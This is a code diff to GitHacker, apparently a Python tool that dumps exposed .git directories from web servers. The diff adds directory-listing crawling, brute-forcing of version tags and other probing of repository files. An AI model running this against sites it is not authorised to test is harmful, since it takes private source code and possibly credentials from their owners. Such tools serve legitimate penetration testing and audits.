@@ -8,7 +8,7 @@ import re
 import git
 import subprocess
 import argparse
-
+import bs4
 
 coloredlogs.install(fmt='%(asctime)s %(levelname)s %(message)s')
 
@@ -25,11 +25,54 @@ class GitHacker():
         self.dst = dst
         self.repo = None
         self.thread_number = threads
+        self.max_semanic_version = 10
 
     def start(self):
         for _ in range(self.thread_number):
             threading.Thread(target=self.worker, daemon=True).start()
 
+        if self.directory_listing_enabled():
+            self.sighted()
+        else:
+            self.blind()
+
+    def directory_listing_enabled(self):
+        response = requests.get("{}{}".format(self.url, ".git/"))
+        keywords = {
+            "apache": "<title>Index of",
+            "nginx": "<title>Index of",
+        }
+        if response.status_code == 200:
+            for server, keyword in keywords.items():
+                if keyword in response.text:
+                    logging.info(
+                        "Directory listing enable under: {}".format(server))
+                    return True
+        return False
+
+    def sighted(self):
+        self.add_folder(self.url, ".git/")
+        self.q.join()
+        self.checkout()
+
+    def add_folder(self, base_url, folder):
+        url = "{}{}".format(base_url, folder)
+        soup = bs4.BeautifulSoup(requests.get(
+            url).text, features="html.parser")
+        links = soup.find_all("a")
+        for link in links:
+            href = link['href']
+            if href == "../" or href == "/":
+                continue
+            if href.endswith("/"):
+                self.add_folder(url, href)
+            else:
+                file_url = "{}{}".format(url, href)
+                print("file:", file_url)
+                path = file_url.replace(self.url, "").split("/")
+                self.q.put(path)
+
+    def blind(self):
         logging.info('Downloading basic files...')
         tn = self.add_basic_file_tasks()
         if tn > 0:
@@ -65,6 +108,9 @@ class GitHacker():
         if tn > 0:
             self.q.join()
 
+        self.checkout()
+
+    def checkout(self):
         logging.info("Checkout files...")
         subprocess.run(
             ["git", "checkout", "."],
@@ -126,52 +172,60 @@ class GitHacker():
 
     def add_basic_file_tasks(self):
         files = [
-            [".git", "COMMIT_EDITMSG", ],
-            [".git", "config", ],
-            [".git", "description", ],
-            [".git", "FETCH_HEAD", ],
-            [".git", "HEAD", ],
-            [".git", "hooks", "applypatch-msg.sample", ],
-            [".git", "hooks", "commit-msg.sample", ],
-            [".git", "hooks", "fsmonitor-watchman.sample", ],
-            [".git", "hooks", "post-update.sample", ],
-            [".git", "hooks", "pre-applypatch.sample", ],
-            [".git", "hooks", "pre-commit.sample", ],
-            [".git", "hooks", "pre-merge-commit.sample", ],
-            [".git", "hooks", "pre-push.sample", ],
-            [".git", "hooks", "pre-rebase.sample", ],
-            [".git", "hooks", "pre-receive.sample", ],
-            [".git", "hooks", "prepare-commit-msg.sample", ],
-            [".git", "hooks", "update.sample", ],
-            [".git", "hooks", "applypatch-msg", ],
-            [".git", "hooks", "commit-msg", ],
-            [".git", "hooks", "fsmonitor-watchman", ],
-            [".git", "hooks", "post-update", ],
-            [".git", "hooks", "pre-applypatch", ],
-            [".git", "hooks", "pre-commit", ],
-            [".git", "hooks", "pre-merge-commit", ],
-            [".git", "hooks", "pre-push", ],
-            [".git", "hooks", "pre-rebase", ],
-            [".git", "hooks", "pre-receive", ],
-            [".git", "hooks", "prepare-commit-msg", ],
-            [".git", "hooks", "update", ],
-            [".git", "index", ],
-            [".git", "info", "exclude", ],
-            [".git", "logs", "HEAD", ],
-            [".git", "logs", "refs", "remotes", "origin", "HEAD", ],
-            [".git", "logs", "refs", "stash", ],
-            [".git", "ORIG_HEAD", ],
-            [".git", "packed-refs", ],
-            [".git", "refs", "remotes", "origin", "HEAD", ],
+            [".git", "COMMIT_EDITMSG"],
+            [".git", "config"],
+            [".git", "description"],
+            [".git", "FETCH_HEAD"],
+            [".git", "HEAD"],
+            [".git", "hooks", "applypatch-msg.sample"],
+            [".git", "hooks", "commit-msg.sample"],
+            [".git", "hooks", "fsmonitor-watchman.sample"],
+            [".git", "hooks", "post-update.sample"],
+            [".git", "hooks", "pre-applypatch.sample"],
+            [".git", "hooks", "pre-commit.sample"],
+            [".git", "hooks", "pre-merge-commit.sample"],
+            [".git", "hooks", "pre-push.sample"],
+            [".git", "hooks", "pre-rebase.sample"],
+            [".git", "hooks", "pre-receive.sample"],
+            [".git", "hooks", "prepare-commit-msg.sample"],
+            [".git", "hooks", "update.sample"],
+            [".git", "hooks", "applypatch-msg"],
+            [".git", "hooks", "commit-msg"],
+            [".git", "hooks", "fsmonitor-watchman"],
+            [".git", "hooks", "post-update"],
+            [".git", "hooks", "pre-applypatch"],
+            [".git", "hooks", "pre-commit"],
+            [".git", "hooks", "pre-merge-commit"],
+            [".git", "hooks", "pre-push"],
+            [".git", "hooks", "pre-rebase"],
+            [".git", "hooks", "pre-receive"],
+            [".git", "hooks", "prepare-commit-msg"],
+            [".git", "hooks", "update"],
+            [".git", "index"],
+            [".git", "info", "exclude"],
+            [".git", "logs", "HEAD"],
+            [".git", "logs", "refs", "remotes", "origin", "HEAD"],
+            [".git", "logs", "refs", "stash"],
+            [".git", "ORIG_HEAD"],
+            [".git", "packed-refs"],
+            [".git", "refs", "remotes", "origin", "HEAD"],
             # git stash
-            [".git", "refs", "stash", ],
-            # git tags
-            [".git", "refs", "tags", "v0.0.1", ],
-            [".git", "refs", "tags", "v1.0.0", ],
+            [".git", "refs", "stash"],
             # pack
-            [".git", "objects", "info", "alternates", ],
-            [".git", "objects", "info", "packs", ],
+            [".git", "objects", "info", "alternates"],
+            [".git", "objects", "info", "http-alternates"],
+            [".git", "objects", "info", "packs"],
         ]
+
+        # git tags
+        for major in range(self.max_semanic_version):
+            for minor in range(self.max_semanic_version):
+                for patch in range(self.max_semanic_version):
+                    files.append(
+                        [".git", "refs", "tags", "v{}.{}.{}".format(major, minor, patch)])
+                    files.append(
+                        [".git", "refs", "tags", "{}.{}.{}".format(major, minor, patch)])
+
         branch_names = ["master", "main", "dev", "release", "test",
                         "testing", "feature", "ng", "fix", "hotfix", "quickfix", ]
         # git remote branches
@@ -203,21 +257,25 @@ class GitHacker():
     def worker(self):
         while True:
             path = self.q.get()
-            fs_path = os.path.join(self.dst, os.path.sep.join(path))
-            url_path = "/".join(path)
-            url = "{}{}".format(self.url, url_path)
-            if not os.path.exists(fs_path):
-                status_code, length, result = self.wget(url, fs_path)
-                if result:
-                    logging.info('[{:d} bytes] {} {}'.format(
-                        length, status_code, url_path))
-                else:
-                    logging.error('[{:d} bytes] {} {}'.format(
-                        length, status_code, url_path))
-            self.q.task_done()
+            if "00000000000000000000000000000000000000" in path:
+                self.q.task_done()
+                continue
+            else:
+                fs_path = os.path.join(self.dst, os.path.sep.join(path))
+                url_path = "/".join(path)
+                url = "{}{}".format(self.url, url_path)
+                if not os.path.exists(fs_path):
+                    status_code, length, result = self.wget(url, fs_path)
+                    if result:
+                        logging.info('[{:d} bytes] {} {}'.format(
+                            length, status_code, url_path))
+                    else:
+                        logging.error('[{:d} bytes] {} {}'.format(
+                            length, status_code, url_path))
+                self.q.task_done()
 
     def check_file_content(self, content):
-        if content.startswith(b"<"):
+        if content.startswith(b"<") or len(content) == 0:
             return False
         return True
 
